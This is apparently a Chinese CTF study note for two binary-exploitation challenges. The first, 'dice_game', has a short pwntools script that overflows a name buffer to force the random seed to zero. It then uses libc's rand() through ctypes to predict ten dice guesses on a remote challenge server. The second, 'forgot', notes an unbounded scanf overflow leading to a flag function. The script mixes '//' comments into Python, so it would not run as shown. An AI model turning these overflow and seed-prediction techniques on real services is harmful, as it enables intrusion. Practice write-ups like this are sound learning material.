dicd_game
seed种子题,需要用到共享C dll函数的ctypes
from pwn import *
from ctypes import *
p=remote("111.198.29.45",55876)
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") //载入此文件的C++库
#p=process("./pwn6")
p.recvuntil("name:")
cs.srand(0) //设置srand(0)
payload="a"*0x20+p64(0) //溢出使seed=0
p.sendline(payload)
y=0
for i in range(10):
p.recvuntil("ur guess number:")
y=cs.rand()%6+1
p.sendline(str(y))
p.interactive()
加载动态链接库如果题目没给,LoadLibrary如果找出来的地址出错,可以用
ldd的方法查询一下
fogot
chsec,发现有一个NX一个PIE,看着很恐怖但题目其实很简单,系统中存在直接求得flag的函数
一共两次键入,第一次名字,限制了长度,第二次scanf,没有限制长度